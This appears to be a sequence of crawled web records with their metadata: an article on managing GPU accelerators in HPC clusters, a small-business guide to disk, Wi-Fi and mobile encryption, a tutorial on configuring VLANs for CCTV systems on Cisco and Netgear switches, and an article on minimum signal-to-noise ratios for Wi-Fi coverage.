The Challenges Presented by GPU Accelerators
Any accelerator technology by definition is an addition over the baseline processor. In modern HPC environments, the dominant baseline architecture is x86_64 servers. Virtually all HPC systems use the Linux operating system (OS) and associated tools as a foundation for HPC processing. Both the Linux OS and underlying x86_64 processors are highly integrated and are heavily used in other areas outside of HPC — particularly web servers.
Virtually all GPU accelerators are added via the PCIe bus. (Note: NVIDIA has announced NVLink™ a high-bandwidth, energy-efficient interconnect that enables ultra-fast communication between the CPU and GPU, and between GPUs.) This arrangement provides a level of separation from the core OS/processor environment. The separation does not allow for the OS to manage processes that run on the accelerator as if they were running on the main system. Even though the accelerator processes are leveraged by the main processors, the host OS does not track memory usage, processor load, power usage or temperatures for the accelerators. In one sense the GPU is a separate computing domain with it’s own distinct memory and computing resources.
From a programming standpoint, the tools mentioned above proved an effective way to create GPU based applications. In terms of management, however, the lack of direct access to the accelerator environment can lead to system-related concerns. In many cases, the default management approach is to assume GPUs are functioning correctly as long as applications seem to be working. Management information is often available separately using specific tools designed for the GPU. For instance, NVIDIA provides the nvidia-smi tool that can be used to examine the state of local accelerators. Monitoring GPU resources with tools like nvidia-smi and NVIDIA’s NVML provide administrators with on-demand reports and data, however, information is often extracted using scripts and sent to a central collection location.
Another challenge facing GPU developers and administrators is the ongoing management of the software environments needed for proper operation. There are several reasons for this situation. First, new versions of the NVIDIA CUDA software and drivers may offer better performance or features not found in the previous version. These new capabilities may need to be tested on separate machines within the cluster infrastructure before they can placed into production. Second, some HPC clusters may have multiple generations of GPU hardware in production and need to manage different kernel versions for specific hardware combinations. Both cluster provisioning and job scheduling must take these differences into account. And finally, there may be specific HPC applications that require specific kernel/driver/CUDA versions for proper operation.
These challenges often create administration issues or “headaches” when trying to manage HPC clusters. Each new combination of hardware and software creates both a monitoring and tool management challenge that often reduces the system throughput. Users and developers find managing tools tedious and error prone, while administrators need ways to make sure the applications are running successfully on the right hardware.
Creating a GPU Computing Resource
The advantages and challenges of GPU accelerators have presented users and vendors with the opportunity to develop a set of best practices for maximizing GPU resources. As will be described in this paper, there are sound strategies that will help minimize the issues mentioned above and keep users and administrators focused on producing scientific results. The goal is to transform a collection of independent hardware components and software tools into an efficiently managed production system.
Next week we’ll publish an article on ‘Best Practices for Maximizing GPU Resources in HPC Clusters’ including:
- Strategy 1: Provide a Unified System so Users/Developers can Focus on Results/Coding
- Strategy 2: Automate Updates
- Strategy 3: Manage User Environments
- Strategy 4: Provide Seamless Support for all GPU Programming Models
- Strategy 5: Plan for the Convergence of HPC and Big Data Analytics
- Strategy 6: Develop a Plan for Cloud-based GPU Processing
- Accelerated Science: GPU Cluster Case Study
If you prefer you can download the complete insideHPC Guide to Managing GPU Clusters courtesy of NVIDIA and Bright Computing. | <urn:uuid:2d431858-87db-47db-afea-f7152d8ac702> | CC-MAIN-2024-38 | https://insidehpc.com/2015/09/strategies-for-managing-gpu-clusters/ | 2024-09-17T09:14:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00228.warc.gz | en | 0.911634 | 1,197 | 2.640625 | 3 |
Every business operates with some level of encryption in their organization. Not many have documented standards for use. Here's what you need to know about encryption to discover the "chinks in your armor" and to optimize your end to end encryption.
Encryption is like cryptography. It uses mathematical algorithms to scramble messages. Only individuals who possess the sender's key are able to decode the message.
Encryption Comes In Different Types
- Individual file and folder encryption -- encrypts specific items. This method should only be used when a few business documents are stored on a computer.
- Volume encryption -- this type creates a container that's fully encrypted. All files and folders created in or saved to that container are encrypted. OneDrive "Personal Vault" is an example of this.
- Full-disk or whole-disk encryption -- the most complete form of computer encryption. It's transparent to users and doesn't require them to save files to a special place on the disk – all files, folders and volumes are encrypted.
- End-to-end encryption -- while the other types above are for "data at rest" end-to-end encryption is for "data in transit." It's goal is to secure data at both ends while it's being communicated between users.
Microsoft BitLocker is a disk encryption tool included in Windows operating systems. It's designed to work with a Trusted Platform Module chip in your computer. That's where the encryption key is stored. It's possible to enable BitLocker without the chip, but a few settings must be configured and it requires admin privileges.
Go to Control Panel > BitLocker Drive Encryption.
Click “Turn on BitLocker” next to the drive you want to encrypt.
Enter a long and varied password.
IMPORTANT: Make a backup of the recovery key using one of the displayed methods.
Choose whether to encrypt used disk space only (faster) and start the encryption process.
When BitLocker is enabled, Microsoft will prompt you to save a copy of your recovery key. You need the recovery key to unlock your disk. Without the key, neither you nor anyone else cannot access the data. You can either print the key or save it to your Microsoft account or a file.
BitLocker also lets you require a PIN at startup.
Apple FileVault is built-in encryption for computers running Mac OS X.
Go to System Preferences > Security & Privacy > FileVault.
Click “Turn On FileVault…”
IMPORTANT: Make a note of the recovery key that is displayed and store it away from your Mac. You're prompted to save it in your iCloud account, but you can choose to write it down instead.
Wait for encryption to complete, but it’s OK to continue using the computer.
Less Than 50% Have End-to-End Encryption
Only communicating users can read the messages. In its simplest terms, that's what end-to-end encryption ensures. In theory, a third-party should not be able to decrypt messages that are protected by end-to-end encryption.
Encryption is a part of any organizations data protection policy. While most applications have encryption standards, many apps and services don't have to comply.
As a result, knowledge workers end up sending some messages protected by end-to-end encryption while other messages they send are not.
One example of this is Microsoft Teams and Zoom.
Teams provides end-to-end encryption with 256-bit Advanced Encryption Standard (AES). It comes with your Office 365 license.
However, Zoom, being a stand-a-lone product, has yet to offer end-to-end encryption to all users.
An update in June on Zoom's blog says that end-to-end encryption services are currently being drafted and that the company has identified a path forward.
A Laptop is Stolen Every 53 Seconds
In the time it takes you to read this sentence, another laptop just got stolen. Even though media reports tend to focus on big data breaches orchestrated by anonymous hackers, physical device theft is still a legitimate concern for businesses.
According to many employee surveys, cars are the most popular place for device theft to occur.
Proper encryption of device drives will ensure that the damage done by a thief doesn't go beyond replacing the hardware.
How WiFi Encryption Works
Hopefully, business owners know that they need to password protect their WiFi network.
Having some level of encryption is better than none, but not all WiFi encryption is the same.
WEP, or "Wired Equivalent Privacy" was the first widely-used WiFi encryption method.
It became the standard back in 1999. However, as computing power has increased, WEP's flaws have become easier and easier to exploit.
Today, even novice hackers can crack WEP passwords in minutes using freely available software.
Around 2003, Wi-Fi Protected Access (WPA) became the answer to WEP's weaknesses.
Two of the major improvements with WPA were message integrity checks, that determine if an attacker has captured or altered packets passed between the access point and client, and the Temporal Key Integrity Protocol (TKIP). TKIP was the predecessor to the current Advanced Encryption Standard (AES).
WPA has been shown to to be vulnerable to intrusion. Most hackers do not attack WPA directly. They instead go after the Wi-Fi Protected Setup (WPS), a supplementary system which was designed to make it easy to link devices to modern access points.
In 2006, WPA was officially suspended in favor of WPA2.
To crack WPA2, a hacker must already have access to the secured Wi-Fi network to then gain access to certain keys. Once the keys have been acquired, attacks can be made on other devices on the network.
While WPA2 is not completely secure, breaking into it requires experience and considerable effort.
Although the safest WiFi encryption option for your business is WPA2 + AES, every WiFi network should be treated as a legitimate security concern.
Running a secure email service is another area that organizations should take seriously.
Microsoft 365 emails are encrypted by default and do not require any additional third party services to do it.
There are some additional settings you should be aware of that can secure your email even more. If you're a business owner using Outlook, contact us to find out how to keep your email data secure.
Accessing PC and Server Data
Password protecting a computer does not mean that it can't be accessed.
Our security systems engineer, Joe Beineke explains it this way:
Encryption for Mobile Devices
If someone picked up your phone and started going through your photos and messages, you would feel vulnerable and awkward.
But your phone might be sharing your private data in the background all the time without your knowledge.
Here's how to encrypt your iPhone.
- Go to Settings > Touch ID & Passcode.
- Press “Turn Passcode On” if not already on.
- Press “Passcode options” to choose a custom numeric or alphanumeric code (recommended).
- Confirm your device is encrypted by scrolling to the bottom of the Settings > Touch ID & Passcode screen.
How to encrypt your Android device.
Plug in the device to charge the battery (required).
Make sure a password or PIN is set in Security > Screen lock.
Go to Settings > Security.
Press the “Encrypt phone” option.
Read the notice and press “Encrypt phone” to start the encryption process.
Remember to keep the phone plugged in until complete.
Encryption Best-Practices Summary
Encryption doesn't necessarily protect your system from weak network security controls. In other words, disk encryption is only a part of the protective suite, but a vital one.
Ironically, while encryption plays a key role in protecting your business from bad guys, it is also the main weapon used by hackers to infect your with ransomware.
- Don't assume that because your computer is password-protected it is encrypted.
- Work with your IT Support Provider to create an encryption standard across your organization.
- Use built-in encryption on your personal and work devices as a minimum defense whenever possible.
- Take extra precautions to secure your email communications.
- Use messenger and chat apps that provide end-to-end encryption.
Need help creating an encryption standard for your small business? | <urn:uuid:7f2088ff-6acc-4aab-aebc-f09b4b843bad> | CC-MAIN-2024-38 | https://www.goptg.com/blog/encryption | 2024-09-18T14:20:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00128.warc.gz | en | 0.932372 | 1,764 | 3.421875 | 3 |
VLAN configuration for CCTV is very important to protect the IP cameras against unauthorized access and also to separate the security camera system from other computers and devices that are connected to the IP network.
If you have layer 2 network switches such as Cisco, Netgear, HP, Dell, Dlink and others, they can be easily configured to be used on your CCTV system.
In this article, I will discuss the importance of VLANs for CCTV, how the technology works and how to do VLAN configuration for CCTV projects.
Let's start by learning the VLAN fundamentals, understand how it is used on network switches and learn how to setup VLAN for security cameras.
What are VLANs
VLAN is a technology used to segment networks by creating virtual groups.
It stands for Virtual Local Area Network and it is frequently used on network switches to create virtual groups to allow broadcast traffic control and also to increase the security access level thus avoiding unauthorized access.
On a switch it is possible to create VLANs and associate them to specific switch ports. Devices such as computers and IP cameras that are connected to the same group of ports will be able to communicate in the network.
VLAN traffic segregation
In a scenario with computers and CCTV cameras connected to the same switch it's possible to create VLANs to separate the broadcast traffic.
The diagram below shows an example of a network switch that has IP CCTV cameras and computers connected to its ports. Notice that the VLANs are created and represented by different names, IP address range, and colors.
On IT environment network admins use to name VLANs by using numbers and colors. In the the picture above you can see VLAN 10 and VLAN 20 using the blue and green color respectively to represent different groups.
VLAN can increase the security in the network by assigning specific switch ports to groups. See the picture below where a man's laptop is connected to port 1 on the Blue VLAN and communicates with PC2 on port 3.
An intruder removes the IP camera from its cable on port 4 to connect his laptop and hack the network. He connects to the Green VLAN to try to hack the security camera but he can't have access to the rest of the network.
The same principle applies to the company worker, he can't have access to the security camera because it's connected to a different VLAN.
How VLAN TAGs work
To be able to control the traffic a switch uses a TAG which is just a way to mark the frames that enter or leave each port,
The frames coming into switch port 1 or 3 are tagged as part of VLAN 10, and frames coming into port 2 or 4 are tagged as part of VLAN 20.
The TAG can be different depending on the switch brand, however there's a universal TAG standard called 802.1Q that is used by most manufacturers.
See the picture below. When the frames come from the IP camera to the switch they are tagged, Those tags are removed before leave the switch.
See below the tags fields according to the universal 802.1Q standard.
SOURCE: Package Source
DESTINATION: Package Destination
TYPE & LEN: Type and size
DATA: The data contained in the package
FRAME CHECK: Frame check
See the illustration of the TAG that is associated with the frame
Communication between switches
When connecting two switches it is necessary to use a special port called "Trunk Port" or "Tagged Port" that will allow the traffic of all the VLANs to pass. So the frames with the 802.1Q TAGs will pass through this port.
Some manufacturers have a slightly difference VLAN ports nomenclature. On Cisco switches documentation the term "Trunk Port" is used for those special ports. Other manufacturers such as Netgear, HP and Dell use the term "Tagged Port" but in any case all of them use 802.1Q TAGs.
Now the IP security cameras and the computers can send traffic from the first to the second switch and still keep the broadcast and security under control.
The first switch can tag the frames that come from the security camera and move them through the trunk (tagged ports) to the second switch.
Type of switches for VLAN configuration
For VLAN configuration is necessary to use layer 2 manageable switches.
Each manufacturer has a different way to create and manage VLANs by using CLI (command line interface) or Web Interface. But in any case the setup is pretty similar and it's very easy to create and configure VLANs.
Example of VLAN configuration for CCTV
Let's take a look at a CCTV camera system with 4 Desktops that use the VLAN 10 and 3 IP cameras and 1 NVR using the VLAN 20.
On this small CCTV project, the VLAN separates the corporate broadcast network traffic from the IP camera broadcast network traffic. See the diagram.
On this CCTV VLAN configuration the desktop users will not be able to have access to the IP cameras or NVR. So your security system is protected.
So, as you can see VLAN configuration for CCTV is very important to keep your system safe from hackers and intruders.
Creating VLANs on a cisco switch
As a quick example, let's see a VLAN configuration on a 8 port Cisco switch. The model is Catalyst 2960 PD that will be configured using the CLI:
USB to serial adapter
The serial cable is a special one used for Cisco Switches and the USB to serial adapter is a TrendNet TU-S9. You can find them on stores such as Amazon.
The console port at the left side of the switch will be used to connect a serial cable from a laptop. A CLI will be used to create and configure the VLANs
A software for CLI commands
After the USB to Serial interface adapter connection is done, you need to setup the software that will be used for the CLI command. I will use a free one called putty. You can download it at https://www.putty.org
Windows serial port configuration
The software configuration is pretty simple, you just need to check which com port the Windows is using for the USB adapter, Just open the Windows Device Manager to check the COM & LPT port. See the picture below.
Putty serial port configuration must match the the data on Windows, for this case they are COM5, Speed 9600, Data bits 8, Stop bits 1 and Parity None.
If the configuration is correct after click "open" you will see the CLI
Create VLAN using the CLI
Create VLANs using a CLI is very simple. In our example I will configure a 8-port Cisco Catalyst 2960 switch. See the steps below:
1. Create the VLAN 10
Open the CLI and execute a sequence of simple commands to get into configuration mode, create the VLAN 10 and give it the name "computers".
2. Assign the ports to the VLAN 10
After create the VLAN is time to assign the ports. Get into configuration mode (conf t) select the port range from 1 to 4 and assign them to the VLAN 10.
Switch(config)#interface range fa0/1 - 4
Switch(config-if-range)#switchport access vlan 10
3. Create the VLAN 20
Execute the same sequence of simple commands. Just get into configuration mode, create the VLAN 20 and give it the name "cameras".
4. Assign the ports to the VLAN 20
The VLAN is created, now just make sure the switch is in configuration mode (conf t) select the port range from 5 to 8 and assign the to the VLAN 20.
Switch(config)#interface range fa0/5 - 8
Switch(config-if-range)#switchport access vlan 20
5. Verify if the VLANs were correctly created
Now it's time to check if the VLANs were created and the ports were assigned. Just exit the configuration mode and use the command below:
See the picture below with the result. It's possible to see that the VLAN 1o and 20 were created with their correct names and the ports were assigned.
6. Save the configuration
Don't forget to save the configuration you just did. See the command below
Switch#copy running-config startup-config
Creating VLANs on a Netgear switch
Most switches such as Netgear Prosafe Smart allow to configure VLANs by using a Web interface, so the process is pretty simple and fast.
Now will an easy task to create a VLAN configuration for CCTV that works for your project by just using few clicks, it's something really easy to do.
Back to the previous example, let's create the VLAN 10 and VLAN 20 for computers and Security cameras respectively.
Using the browser interface to create VLANs
Create the VLAN configuration for CCTV cameras is very simple, you just need to connect a UTP cable from the laptop to one of switch's port, open a web browser and follow the steps below:
1. Login using your credentials
Check your switch manual to find out what is the default IP address and login password or use the one you just created for your CCTV camera project.
2. Open the TAB to configure VLAN
Open the Switching TAB and click on "VLAN" and note that some VLANs are already created, so don't use the same VLAN ID for your project.
3. Create the VLAN for computers
On the configuration tab just create the ID 10 and give the VLAN a name, in our case that will be "Computers"
5. Set the Untagged ports
Ports that are connected to IP cameras and computers are called Untagged ports, meaning those devices are not bringing Tagged Frames to the ports, so it's necessary to open the Membership TAB and ckeck the ports with an "U"
In our example ports from 1 to 4 must have the " U". See the picture below,
6. Repeat the process for VLAN 20
Create the VLAN, name it and set the untagged ports from 5 to 8
VLAN configuration for large CCTV projects
For larger CCTV projects it's just a question to escalate the network, create VLANs and configure the trunk ports (or tagged ports) between switches.
Just create the VLANs on both switches, use a UTP cable to connected them and configure those ports as trunk or tagged ports. See the diagram.
In this example, the blue computers can't broadcast or have access to the IP cameras or NVRs, so the surveillance network is safe from hackers or virus.
Configuring a Cisco Switch trunk
If you are using Cisco Switches on both ends of the network, just connect the cables to the port, let's say port 10 for example, make sure the switch is using the standard 802.1Q we discussed earlier and convert the port into a trunk.
The configuration is simple, just get into the port you want to use as a trunk and type the commands below:
Switch(config)#switchport trunk encapsulation dot1q
Switch(config-if-range)#switchport mode trunk
Configuring Netgear Switch tagged ports
As long the switches are connected and the VLANs are created on both sides of the network, you just need to configure the tagged ports on them.
Go to the VLAN Membership and TAG the port you want to connect to the next switch with a " T" that stands for tagged. In our example is the port 10.
Repeat the process for the VLAN 20 by tagging the same port
VLAN configuration for CCTV cameras is not rocket science.
VLAN can be used to secure and improve a CCTV System, it's just a question of switch installation and configuration. It doesn't matter the switch's brand, as long as you have a manageable layer 2 device you can create the VLANs
If you need to use more advanced configuration such as give access to more than one computer to different VLANS than it's necessary to use a router or layer 3 switch for Inter-vlan routing. But this is a topic for another article.
Want to learn more ?
If you want to become a professional CCTV installer or designer, take a look at the material available in the blog. Just click the links below:
Please share this information with your friends... | <urn:uuid:6b04b328-0337-4950-9068-af837563dd4d> | CC-MAIN-2024-38 | https://learncctv.com/the-use-of-vlans-in-cctv/ | 2024-09-19T21:05:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00028.warc.gz | en | 0.89165 | 2,596 | 2.53125 | 3 |
When performing an RF site survey, it’s important to define the range boundary of an access point based on signal-to-noise (SNR) ratio, which is the signal level (in dBm) minus the noise level (in dBm). For example, a signal level of -53 dBm measured near an access point and typical noise level of -90 dBm yields a SNR of 37 dB, a healthy value for wireless LANs. Don’t let the unit “dB” throw you—it merely represents a difference in two logarithmic values, such as dBm.
SNR impacts performance
The SNR of an access point signal, measured at the user device, decreases as range to the user increases because the applicable free space loss between the user and the access point reduces signal level. The same goes for the signals propagating from the user device to the access point. An increase in RF interference from microwave ovens and cordless phones, which increases the noise level, also decreases SNR.
SNR directly impacts the performance of a wireless LAN connection. A higher SNR value means that the signal strength is stronger in relation to the noise levels, which allows higher data rates and fewer retransmissions—all of which offers better throughput. Of course the opposite is also true. A lower SNR requires wireless LAN devices to operate at lower data rates, which decreases throughput. An SNR of 30 dB, for example, may allow an 802.11g client radio and access point to communicate at 24 Mbps; whereas, a SNR of 15 dB may only provide for 6 Mbps.
My company, Wireless-Nets, has performed extensive testing of wireless LANs at various SNR levels. For instance, we’ve run user-oriented tests to determine the impacts of SNR values on the ability for a user with a typical client radio (set to 30 mW) to associate with an 802.11b/g access point and load a particular webpage. For various SNRs, the following is what we found for the signal strength (found in the Windows connection status), association status, and performance when loading a particular Web page from a wireless laptop. We measured the SNR value from the same laptop and client radio using AirMagnet Analyzer. To ensure accurate comparisons, we cleared the laptop’s cache before reloading the page:
- > 40dB SNR = Excellent signal (5 bars); always associated; lightning fast.
- 25dB to 40dB SNR = Very good signal (3 – 4 bars); always associated; very fast.
- 15dB to 25dB SNR = Low signal (2 bars); always associated; usually fast.
- 10dB – 15dB SNR = Very low signal (1 bar); mostly associated; mostly slow.
- 5dB to 10dB SNR = No signal; not associated; no go.
These values seem consistent with testing we’ve done in the past, as well as what some of the vendors publish.
Based on this testing, we recommend using around 20dB as the minimum SNR for defining the range boundary of each access point. That ensures a constant association with fairly good performance when performing typical network functions, such as Web browsing and e-mail synchronization. If you plan to deploy voice over a wireless LAN, then you’ll likely need a higher minimum SNR. For example, Cisco recommends 25 dB for their wireless voice telephony systems. Also, a larger margin (i.e., higher SNR), may be necessary in some venues, especially where there is a great deal of multipath signal propagation, such as manufacturing plants and where airplanes park at airports. Keep in mind that the corresponding level of performance only occurs at the boundary of each access point. Users associating with access points at closer range will have higher SNR and better performance.
When measuring SNRs, use the same client radio and antenna as the users will have if possible. A variance in antenna gain between the survey equipment and user device, for example, will likely result in users having a different SNR (and performance) than what you measured during the survey. Also, some client radios have better transmit power and receive sensitivity than others, which can throw off your results if you don’t use the same client radio as the users will have.
Changes made in the facility, such as the addition of walls and movement of large boxes will affect SNR too. Thus, it’s generally a good idea to recheck the SNR from time-to-time, even after the network is operational. This can be done easily with commercially-available tools. For example, the figure below is a screenshot taken from AirMagnet Survey, with the green and yellow colors indicating acceptable signal coverage areas of an 802.11g network with the tool set to a range boundary of 20 dB. If you find that the SNR is below the minimum value in some areas, such as the gray-shaded areas in the figure, consider installing additional access points or moving existing ones better distribute the signals and fill in the holes.
The use of a particular SNR value as a requirement for signal coverage is certainly a good practice, and the rules of thumb given in this tutorial are a good starting point. Before making the system operational, however, always perform thorough verification testing of the applications, such as Web browsing, e-mail, and voice telephony, using typical client devices and radios that will actually utilize the network. This provides reassurance that the system will indeed satisfy coverage and performance requirements.
Jim Geier provides independent consulting services and training to companies developing and deploying wireless networks for enterprises and municipalities. He is the author of a dozen books on wireless topics, with recent releases including Deploying Voice over Wireless LANs (Cisco Press) and Implementing 802.1x Security Solutions (Wiley).
Article courtesy of Wi-Fi Planet | <urn:uuid:0853085d-29d8-4f81-8170-e75f60b73b36> | CC-MAIN-2024-38 | https://www.enterprisenetworkingplanet.com/standards-protocols/wi-fi-define-minimum-snr-values-for-signal-coverage/ | 2024-09-07T18:17:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00228.warc.gz | en | 0.929076 | 1,222 | 3.203125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.